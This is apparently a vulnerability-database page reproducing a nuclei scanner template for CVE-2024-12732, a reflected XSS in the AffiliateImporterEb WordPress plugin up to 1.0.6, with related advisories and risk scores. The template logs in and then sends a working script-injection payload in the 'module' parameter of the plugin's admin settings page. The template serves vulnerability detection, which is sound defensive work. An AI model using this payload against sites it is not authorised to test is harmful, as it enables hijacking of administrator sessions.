Lucene search
K

AffiliateImporterEb <= 1.0.6 - Reflected XSS

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

AffiliateImporterEb up to version 1.0.6 has a reflected script injection enabling admin user compromise via crafted requests.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12732
7 Feb 202603:22
circl
CNNVD
WordPress plugin AffiliateImporterEb 安全漏洞
15 May 202500:00
cnnvd
CVE
CVE-2024-12732
15 May 202520:06
cve
Cvelist
CVE-2024-12732 AffiliateImporterEb <= 1.0.6 - Reflected XSS
15 May 202520:06
cvelist
EUVD
EUVD-2025-15322
3 Oct 202520:07
euvd
NVD
CVE-2024-12732
15 May 202520:15
nvd
OSV
CVE-2024-12732
15 May 202520:15
osv
Patchstack
WordPress AffiliateImporterEb plugin <= 1.0.6 - Reflected XSS vulnerability
18 May 202523:57
patchstack
Positive Technologies
PT-2025-21435
15 May 202500:00
ptsecurity
RedhatCVE
CVE-2024-12732
17 May 202521:04
redhatcve
Rows per page
id: CVE-2024-12732

info:
  name: AffiliateImporterEb <= 1.0.6 - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    AffiliateImporterEb WordPress plugin through 1.0.6 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version beyond 1.0.6.
  reference:
    - https://wpscan.com/vulnerability/bc46edd8-8d77-4567-873b-e9e90a01adcf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12732
    cwe-id: CWE-79
    epss-score: 0.00521
    epss-percentile: 0.40466
    cpe: cpe:2.3:a:cr1000:affiliateimportereb:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cr1000
    product: affiliateimportereb
  tags: cve,cve2024,cr1000,wp-scan,wordpress,wp-plugin,affiliateimportereb,authenticated,xss,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ebdn-settings&module=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","affiliateimportereb")
        condition: and
# digest: 4a0a0047304502204ead1278cd28e6d329b15391eccdc45ea70c045f252c0f2057c68877fd1a9233022100faabdade298d98a8743895d5c83a7fe3264efd5881d62c40ab1e3166dc19f92d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:22Current
6Medium risk
Vulners AI Score6
CVSS 3.16.1
EPSS0.00521
SSVC
9